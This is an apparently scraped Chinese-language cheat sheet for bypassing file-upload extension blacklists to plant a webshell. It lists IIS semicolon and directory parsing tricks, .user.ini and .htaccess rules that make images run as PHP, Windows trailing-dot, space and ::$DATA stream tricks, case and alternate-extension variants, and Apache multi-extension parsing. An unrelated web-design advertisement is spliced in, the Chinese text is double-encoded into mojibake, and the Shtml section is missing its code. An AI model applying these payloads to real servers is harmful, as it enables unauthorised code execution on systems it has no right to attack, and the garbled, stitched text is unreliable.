當(dāng)做代碼的審計(jì)或者文件搞滲文章上傳的時(shí)候有時(shí)候會(huì)遇到黑名單的驗(yàn)證碼,比如常規(guī)的一些腳本名asp php jsp這種的不允許上傳,下面是我總結(jié)的一些繞過的方法

成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)服務(wù)團(tuán)隊(duì)是一支充滿著熱情的團(tuán)隊(duì)，執(zhí)著、敏銳、追求更好，是創(chuàng)新互聯(lián)的標(biāo)準(zhǔn)與要求，同時(shí)竭誠(chéng)為客戶提供服務(wù)是我們的理念。成都創(chuàng)新互聯(lián)把每個(gè)網(wǎng)站當(dāng)做一個(gè)產(chǎn)品來開發(fā)，精雕細(xì)琢，追求一名工匠心中的細(xì)致，我們更用心！

Shtml

//可以用來讀文件

//可以用來執(zhí)行命令

iis解析

sanr.php;.gif

sanr.asp;.jpg

sanr.asp/sanr.jpg

.user.ini

User.ini

auto_prepend_file:指定在每個(gè)PHP頁面執(zhí)行前所要執(zhí)行的代碼

auto_prepend_file=demo.gif (每個(gè)頁面都會(huì)加載demo.gif)

.htaccess

AddTypeapplication/x-httpd-php     .jpg

Window特性

1.   利用空格        demo.php空格 

2.   小數(shù)點(diǎn)去繞過      demo.php.

3.   Ads數(shù)據(jù)流         demo.php::$DATA

4.   Ads數(shù)據(jù)流(但文件是空)  demo.php:jpg

Window通配符   demo.<<<   兩者相結(jié)合拿到webshell

Tips：直接用3就可以  只不過延伸下window通配符的方法

      Window通配符可以在包含文件的時(shí)候包含c:window/temp目錄臨時(shí)php文件(文件包含本地測(cè)試成功 但是實(shí)際***很少成功 因?yàn)閟ession文件也是php開頭 如同時(shí)匹配多個(gè)文件以php開頭的這種，會(huì)拿到第一個(gè)php文件，不確保是自己上傳的臨時(shí)文件)

大小寫繞過

aSp  pHp  JsP

擴(kuò)展名繞過

Asp：asa  cer  cdx 

Aspx: ashx  asmx ascx

Php:  php3 phtml

Jsp:   jspx  jspf

Apache的解析

         sanr.php.xxxxxx